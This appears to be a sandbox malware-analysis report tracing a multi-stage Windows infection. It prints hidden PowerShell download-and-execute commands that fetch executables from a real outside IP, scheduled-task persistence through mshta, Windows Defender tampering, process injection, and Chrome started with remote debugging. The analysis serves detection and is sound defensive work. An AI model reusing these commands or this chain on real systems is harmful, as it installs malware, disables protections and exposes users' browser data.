pid Process 1564 88345910e7756216c80bf4046952980b.exe 1564 88345910e7756216c80bf4046952980b.exe 400 skotes.exe 400 skotes.exe 4764 7tzlyz8.exe 4760 powershell.exe 4760 powershell.exe 3552 powershell.exe 3552 powershell.exe 2560 TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE 2560 TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE 1520 powershell.exe 1520 powershell.exe 5044 powershell.exe 5044 powershell.exe 2560 TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE 2560 TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE 5068 powershell.exe 5068 powershell.exe 3164 483d2fa8a0d53818306efeb32d3.exe 3164 483d2fa8a0d53818306efeb32d3.exe 4344 skotes.exe 4344 skotes.exe 3092 9d1f9cbe0c.exe 3092 9d1f9cbe0c.exe 3092 9d1f9cbe0c.exe 3092 9d1f9cbe0c.exe 1904 5f380d8c90.exe 1904 5f380d8c90.exe 1904 5f380d8c90.exe 1904 5f380d8c90.exe 1904 5f380d8c90.exe 1904 5f380d8c90.exe 3112 ftS1RPn.exe 3112 ftS1RPn.exe 3740 ebp51gY.exe 3740 ebp51gY.exe 3740 ebp51gY.exe 3740 ebp51gY.exe 3740 ebp51gY.exe 3740 ebp51gY.exe 1988 uXivbut.exe 1988 uXivbut.exe 4364 Gxtuum.exe 4364 Gxtuum.exe 3080 8QQOJj9.exe 3080 8QQOJj9.exe 3080 8QQOJj9.exe 3080 8QQOJj9.exe 3080 8QQOJj9.exe 3080 8QQOJj9.exe 4496 sha256.exe 4496 sha256.exe 1300 04bc3c33ae.exe 1300 04bc3c33ae.exe 1300 04bc3c33ae.exe 4024 2d7e0e2767.exe 4024 2d7e0e2767.exe 4024 2d7e0e2767.exe 1204 skotes.exe 1204 skotes.exe 4024 2d7e0e2767.exe 4024 2d7e0e2767.exe 3068 Gxtuum.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
pid Process 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe -
Suspicious use of AdjustPrivilegeToken 33 IoCs
description pid Process Token: SeDebugPrivilege 4764 7tzlyz8.exe Token: SeDebugPrivilege 4764 7tzlyz8.exe Token: SeDebugPrivilege 4760 powershell.exe Token: SeDebugPrivilege 3552 powershell.exe Token: SeDebugPrivilege 1520 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 2560 TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE Token: SeDebugPrivilege 5068 powershell.exe Token: SeDebugPrivilege 1300 04bc3c33ae.exe Token: SeDebugPrivilege 4024 2d7e0e2767.exe Token: SeDebugPrivilege 3596 7tzlyz8.exe Token: SeDebugPrivilege 1172 AddInProcess32.exe Token: SeDebugPrivilege 2308 AddInProcess32.exe Token: SeShutdownPrivilege 1072 chrome.exe Token: SeCreatePagefilePrivilege 1072 chrome.exe Token: SeShutdownPrivilege 1072 chrome.exe Token: SeCreatePagefilePrivilege 1072 chrome.exe Token: SeShutdownPrivilege 1072 chrome.exe Token: SeCreatePagefilePrivilege 1072 chrome.exe Token: SeShutdownPrivilege 1072 chrome.exe Token: SeCreatePagefilePrivilege 1072 chrome.exe Token: SeShutdownPrivilege 1072 chrome.exe Token: SeCreatePagefilePrivilege 1072 chrome.exe Token: SeDebugPrivilege 5800 taskkill.exe Token: SeShutdownPrivilege 1072 chrome.exe Token: SeCreatePagefilePrivilege 1072 chrome.exe Token: SeShutdownPrivilege 1072 chrome.exe Token: SeCreatePagefilePrivilege 1072 chrome.exe Token: SeDebugPrivilege 5900 taskkill.exe Token: SeDebugPrivilege 5980 taskkill.exe Token: SeDebugPrivilege 6048 taskkill.exe Token: SeDebugPrivilege 4080 taskkill.exe Token: SeDebugPrivilege 5288 powershell.exe -
Suspicious use of FindShellTrayWindow 40 IoCs
pid Process 1564 88345910e7756216c80bf4046952980b.exe 936 3dc1ff6f06.exe 936 3dc1ff6f06.exe 936 3dc1ff6f06.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 1072 chrome.exe 5772 d5ad6d736f.exe 5772 d5ad6d736f.exe 5772 d5ad6d736f.exe 5772 d5ad6d736f.exe 5772 d5ad6d736f.exe 5772 d5ad6d736f.exe 4468 d842b69899.exe 4468 d842b69899.exe 4468 d842b69899.exe 5772 d5ad6d736f.exe -
Suspicious use of SendNotifyMessage 13 IoCs
pid Process 936 3dc1ff6f06.exe 936 3dc1ff6f06.exe 936 3dc1ff6f06.exe 5772 d5ad6d736f.exe 5772 d5ad6d736f.exe 5772 d5ad6d736f.exe 5772 d5ad6d736f.exe 5772 d5ad6d736f.exe 5772 d5ad6d736f.exe 4468 d842b69899.exe 4468 d842b69899.exe 4468 d842b69899.exe 5772 d5ad6d736f.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 4764 7tzlyz8.exe 2168 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1564 wrote to memory of 400 1564 88345910e7756216c80bf4046952980b.exe 86 PID 1564 wrote to memory of 400 1564 88345910e7756216c80bf4046952980b.exe 86 PID 1564 wrote to memory of 400 1564 88345910e7756216c80bf4046952980b.exe 86 PID 400 wrote to memory of 4764 400 skotes.exe 87 PID 400 wrote to memory of 4764 400 skotes.exe 87 PID 400 wrote to memory of 936 400 skotes.exe 88 PID 400 wrote to memory of 936 400 skotes.exe 88 PID 400 wrote to memory of 936 400 skotes.exe 88 PID 936 wrote to memory of 1740 936 3dc1ff6f06.exe 89 PID 936 wrote to memory of 1740 936 3dc1ff6f06.exe 89 PID 936 wrote to memory of 1740 936 3dc1ff6f06.exe 89 PID 936 wrote to memory of 4756 936 3dc1ff6f06.exe 90 PID 936 wrote to memory of 4756 936 3dc1ff6f06.exe 90 PID 936 wrote to memory of 4756 936 3dc1ff6f06.exe 90 PID 1740 wrote to memory of 4380 1740 cmd.exe 93 PID 1740 wrote to memory of 4380 1740 cmd.exe 93 PID 1740 wrote to memory of 4380 1740 cmd.exe 93 PID 4756 wrote to memory of 4760 4756 mshta.exe 94 PID 4756 wrote to memory of 4760 4756 mshta.exe 94 PID 4756 wrote to memory of 4760 4756 mshta.exe 94 PID 400 wrote to memory of 836 400 skotes.exe 96 PID 400 wrote to memory of 836 400 skotes.exe 96 PID 400 wrote to memory of 836 400 skotes.exe 96 PID 836 wrote to memory of 388 836 cmd.exe 98 PID 836 wrote to memory of 388 836 cmd.exe 98 PID 836 wrote to memory of 388 836 cmd.exe 98 PID 388 wrote to memory of 4504 388 cmd.exe 100 PID 388 wrote to memory of 4504 388 cmd.exe 100 PID 388 wrote to memory of 4504 388 cmd.exe 100 PID 388 wrote to memory of 4316 388 cmd.exe 101 PID 388 wrote to memory of 4316 388 cmd.exe 101 PID 388 wrote to memory of 4316 388 cmd.exe 101 PID 4316 wrote to memory of 3552 4316 cmd.exe 102 PID 4316 wrote to memory of 3552 4316 cmd.exe 102 PID 4316 wrote to memory of 3552 4316 cmd.exe 102 PID 4760 wrote to memory of 2560 4760 powershell.exe 103 PID 4760 wrote to memory of 2560 4760 powershell.exe 103 PID 4760 wrote to memory of 2560 4760 powershell.exe 103 PID 388 wrote to memory of 1884 388 cmd.exe 104 PID 388 wrote to memory of 1884 388 cmd.exe 104 PID 388 wrote to memory of 1884 388 cmd.exe 104 PID 1884 wrote to memory of 1520 1884 cmd.exe 105 PID 1884 wrote to memory of 1520 1884 cmd.exe 105 PID 1884 wrote to memory of 1520 1884 cmd.exe 105 PID 388 wrote to memory of 1152 388 cmd.exe 106 PID 388 wrote to memory of 1152 388 cmd.exe 106 PID 388 wrote to memory of 1152 388 cmd.exe 106 PID 1152 wrote to memory of 5044 1152 cmd.exe 107 PID 1152 wrote to memory of 5044 1152 cmd.exe 107 PID 1152 wrote to memory of 5044 1152 cmd.exe 107 PID 388 wrote to memory of 4296 388 cmd.exe 108 PID 388 wrote to memory of 4296 388 cmd.exe 108 PID 388 wrote to memory of 4296 388 cmd.exe 108 PID 388 wrote to memory of 2800 388 cmd.exe 109 PID 388 wrote to memory of 2800 388 cmd.exe 109 PID 388 wrote to memory of 2800 388 cmd.exe 109 PID 2800 wrote to memory of 5068 2800 mshta.exe 110 PID 2800 wrote to memory of 5068 2800 mshta.exe 110 PID 2800 wrote to memory of 5068 2800 mshta.exe 110 PID 5068 wrote to memory of 3164 5068 powershell.exe 112 PID 5068 wrote to memory of 3164 5068 powershell.exe 112 PID 5068 wrote to memory of 3164 5068 powershell.exe 112 PID 400 wrote to memory of 680 400 skotes.exe 113 PID 400 wrote to memory of 680 400 skotes.exe 113
Processes
-
C:\Users\Admin\AppData\Local\Temp\88345910e7756216c80bf4046952980b.exe"C:\Users\Admin\AppData\Local\Temp\88345910e7756216c80bf4046952980b.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:400 -
C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"C:\Users\Admin\AppData\Local\Temp\1091048001\7tzlyz8.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4764
-
-
C:\Users\Admin\AppData\Local\Temp\1091274101\3dc1ff6f06.exe"C:\Users\Admin\AppData\Local\Temp\1091274101\3dc1ff6f06.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:936 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 5ndDrmataqB /tr "mshta C:\Users\Admin\AppData\Local\Temp\nKVMBIQ19.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1740 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 5ndDrmataqB /tr "mshta C:\Users\Admin\AppData\Local\Temp\nKVMBIQ19.hta" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4380
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\nKVMBIQ19.hta4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'RY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4760 -
C:\Users\Admin\AppData\Local\TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE"C:\Users\Admin\AppData\Local\TempRY6IWSBC9EJ5WXMAUHZ7FM4GZ6RXHW7H.EXE"6⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2560
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" "3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:836 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1091275021\am_no.cmd" any_word4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:388 -
C:\Windows\SysWOW64\timeout.exetimeout /t 25⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:4504
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4316 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3552
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1520
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1152 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"6⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "koAiCmaZmPq" /tr "mshta \"C:\Temp\059knWxs8.hta\"" /sc minute /mo 25 /ru "Admin" /f5⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4296
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\059knWxs8.hta"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2800 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5068 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3164
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091320001\d538f57e36.exe"C:\Users\Admin\AppData\Local\Temp\1091320001\d538f57e36.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:680 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:2596
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091321001\9d1f9cbe0c.exe"C:\Users\Admin\AppData\Local\Temp\1091321001\9d1f9cbe0c.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3092
-
-
C:\Users\Admin\AppData\Local\Temp\1091322001\5f380d8c90.exe"C:\Users\Admin\AppData\Local\Temp\1091322001\5f380d8c90.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1904
-
-
C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe"C:\Users\Admin\AppData\Local\Temp\1091323001\ftS1RPn.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3112
-
-
C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe"C:\Users\Admin\AppData\Local\Temp\1091324001\ebp51gY.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3740
-
-
C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:744 -
C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"C:\Users\Admin\AppData\Local\Temp\1091325001\DF9PCFR.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3852
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe"C:\Users\Admin\AppData\Local\Temp\1091326001\uXivbut.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1988 -
C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4364 -
C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe"C:\Users\Admin\AppData\Roaming\10000180100\sha256.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4496
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe"C:\Users\Admin\AppData\Local\Temp\1091327001\8QQOJj9.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3080
-
-
C:\Users\Admin\AppData\Local\Temp\1091328001\04bc3c33ae.exe"C:\Users\Admin\AppData\Local\Temp\1091328001\04bc3c33ae.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1300 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1172 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵PID:4312
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:1136
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091329001\2d7e0e2767.exe"C:\Users\Admin\AppData\Local\Temp\1091329001\2d7e0e2767.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4024 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:4164
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"5⤵PID:3852
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵PID:712
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091330001\7tzlyz8.exe"C:\Users\Admin\AppData\Local\Temp\1091330001\7tzlyz8.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3596
-
-
C:\Users\Admin\AppData\Local\Temp\1091331001\2f49ddd8ab.exe"C:\Users\Admin\AppData\Local\Temp\1091331001\2f49ddd8ab.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:1900 -
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"4⤵
- System Location Discovery: System Language Discovery
PID:976
-
-
-
C:\Users\Admin\AppData\Local\Temp\1091332001\cfab217946.exe"C:\Users\Admin\AppData\Local\Temp\1091332001\cfab217946.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3200
-
-
C:\Users\Admin\AppData\Local\Temp\1091334001\3aa1c2e209.exe"C:\Users\Admin\AppData\Local\Temp\1091334001\3aa1c2e209.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:4920 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"4⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1072 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xc8,0x104,0x7ff8b3a4cc40,0x7ff8b3a4cc4c,0x7ff8b3a4cc585⤵PID:4972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1920 /prefetch:25⤵PID:1784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2152,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2188 /prefetch:35⤵PID:2744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2216,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2496 /prefetch:85⤵PID:2920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3188,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3232 /prefetch:15⤵
- Uses browser remote debugging
PID:4528
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3196,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=3300 /prefetch:15⤵
- Uses browser remote debugging
PID:2368
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4528,i,16580839361355849462,15151393390753264080,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4516 /prefetch:15⤵
- Uses browser remote debugging
PID:4360
-
-
